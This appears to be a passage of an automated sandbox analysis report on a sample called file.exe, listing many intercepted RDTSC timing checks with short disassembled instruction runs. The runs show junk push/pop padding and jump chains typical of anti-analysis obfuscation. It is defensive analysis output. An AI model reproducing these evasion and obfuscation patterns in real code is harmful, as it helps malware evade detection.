Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDDA0 second address: 3FDDAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F856102FBE6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDDAF second address: 3FDDB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDDB3 second address: 3FDDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDDB9 second address: 3FDDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A866h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FE1E5 second address: 3FE1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4055EE second address: 4055F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4055F4 second address: 405608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F856102FBE6h 0x0000000a jmp 00007F856102FBEAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 405608 second address: 40562B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856106A861h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40562B second address: 405646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F856102FBE8h 0x0000000b jl 00007F856102FBF2h 0x00000011 jns 00007F856102FBE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3734B7 second address: 3734BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 404700 second address: 404704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 404F2E second address: 404F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F856106A868h 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F856106A856h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4050CD second address: 4050EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F856102FBF7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409BE3 second address: 409C03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A866h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409C03 second address: 409C0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409C0F second address: 409C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 408B3F second address: 408B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9263 second address: 3C9269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9269 second address: 3C9282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F856102FBE8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C933F second address: 3C9344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C953E second address: 3C954C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C954C second address: 3C9562 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F856106A858h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jo 00007F856106A85Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9562 second address: 3C956A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C956A second address: 3C956E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C956E second address: 3C9572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9572 second address: 20E9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F856106A858h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 movzx edi, cx 0x00000025 push dword ptr [ebp+122D0931h] 0x0000002b jmp 00007F856106A85Dh 0x00000030 call dword ptr [ebp+122D3547h] 0x00000036 pushad 0x00000037 jc 00007F856106A862h 0x0000003d jg 00007F856106A85Ch 0x00000043 xor eax, eax 0x00000045 jnp 00007F856106A857h 0x0000004b cld 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 clc 0x00000051 mov dword ptr [ebp+122D36F8h], eax 0x00000057 mov dword ptr [ebp+122D1D2Ah], eax 0x0000005d mov esi, 0000003Ch 0x00000062 ja 00007F856106A857h 0x00000068 clc 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d xor dword ptr [ebp+122D1D6Eh], ecx 0x00000073 lodsw 0x00000075 jmp 00007F856106A867h 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e jmp 00007F856106A85Ah 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 add dword ptr [ebp+122D1D2Ah], ecx 0x0000008d cmc 0x0000008e push eax 0x0000008f pushad 0x00000090 jl 00007F856106A85Ch 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9682 second address: 3C9686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9686 second address: 20E9D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jno 00007F856106A856h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 jmp 00007F856106A85Dh 0x00000018 popad 0x00000019 nop 0x0000001a add dword ptr [ebp+122D34E9h], edi 0x00000020 mov edx, dword ptr [ebp+122D3610h] 0x00000026 push dword ptr [ebp+122D0931h] 0x0000002c mov ecx, 634F4413h 0x00000031 call dword ptr [ebp+122D3547h] 0x00000037 pushad 0x00000038 jc 00007F856106A862h 0x0000003e jg 00007F856106A85Ch 0x00000044 xor eax, eax 0x00000046 jnp 00007F856106A857h 0x0000004c cld 0x0000004d mov edx, dword ptr [esp+28h] 0x00000051 clc 0x00000052 mov dword ptr [ebp+122D36F8h], eax 0x00000058 mov dword ptr [ebp+122D1D2Ah], eax 0x0000005e mov esi, 0000003Ch 0x00000063 ja 00007F856106A857h 0x00000069 clc 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e xor dword ptr [ebp+122D1D6Eh], ecx 0x00000074 lodsw 0x00000076 jmp 00007F856106A867h 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f jmp 00007F856106A85Ah 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 add dword ptr [ebp+122D1D2Ah], ecx 0x0000008e cmc 0x0000008f push eax 0x00000090 pushad 0x00000091 jl 00007F856106A85Ch 0x00000097 push eax 0x00000098 push edx 0x00000099 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9737 second address: 3C973B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C973B second address: 3C9767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F856106A85Bh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push ebx 0x00000013 jmp 00007F856106A85Eh 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9767 second address: 3C976B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C976B second address: 3C9793 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F856106A867h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9793 second address: 3C97AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C97AF second address: 3C97B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9881 second address: 3C9885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C98E9 second address: 3C9929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F856106A858h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F856106A858h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 pushad 0x00000029 or dword ptr [ebp+1247DAB4h], esi 0x0000002f popad 0x00000030 nop 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9929 second address: 3C992D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C992D second address: 3C9958 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F856106A869h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9A6A second address: 3C9A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F856102FBF2h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 js 00007F856102FBF0h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9C46 second address: 3C9C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9F81 second address: 3C9F97 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F856102FBE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9F97 second address: 3C9FA1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F856106A85Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9FA1 second address: 3C9FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or dword ptr [ebp+12473A9Bh], eax 0x0000000d push 0000001Eh 0x0000000f mov edi, dword ptr [ebp+122D3900h] 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F856102FBF1h 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2D0 second address: 3CA2D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2D4 second address: 3CA2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2E0 second address: 3CA2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2E4 second address: 3CA2E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2E8 second address: 3CA30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push edi 0x0000000d jmp 00007F856106A85Dh 0x00000012 pop edi 0x00000013 pop edi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409636 second address: 409644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409644 second address: 409648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409648 second address: 409664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F856102FBE6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409664 second address: 40966E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40966E second address: 409678 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40F858 second address: 40F85C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40F85C second address: 40F862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40F9EB second address: 40FA08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A869h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40FA08 second address: 40FA0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40FB88 second address: 40FB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40FB8D second address: 40FB9E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F856102FBECh 0x00000008 ja 00007F856102FBE6h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40FB9E second address: 40FBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F856106A856h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jnc 00007F856106A856h 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 417E09 second address: 417E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 417E10 second address: 417E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007F856106A856h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 418283 second address: 4182B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F856102FBF9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F856102FBF4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4182B6 second address: 4182D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F856106A868h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4182D4 second address: 4182DE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F856102FBE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4182DE second address: 4182EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F856106A856h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 41BA3B second address: 41BA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnl 00007F856102FBE6h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 41BA4E second address: 41BA5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 421FF6 second address: 421FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 420F16 second address: 420F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jc 00007F856106A856h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9E3A second address: 3C9EA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F856102FBE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F856102FBE8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b movzx ecx, si 0x0000002e push 00000004h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F856102FBE8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a adc di, 0F2Eh 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9EA3 second address: 3C9EC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F856106A860h 0x00000012 jmp 00007F856106A85Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4210A5 second address: 4210A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4210A9 second address: 4210AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4210AF second address: 4210C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F856102FBEAh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 42A179 second address: 42A181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428116 second address: 428132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F856102FBF3h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428132 second address: 428137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428137 second address: 42813D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4282BD second address: 4282DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A866h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 42877C second address: 4287B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F856102FBEEh 0x0000000d jmp 00007F856102FBF9h 0x00000012 ja 00007F856102FBE6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428D8F second address: 428D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428D93 second address: 428D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 429088 second address: 429095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 429095 second address: 4290AC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F856102FBE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jng 00007F856102FBE6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
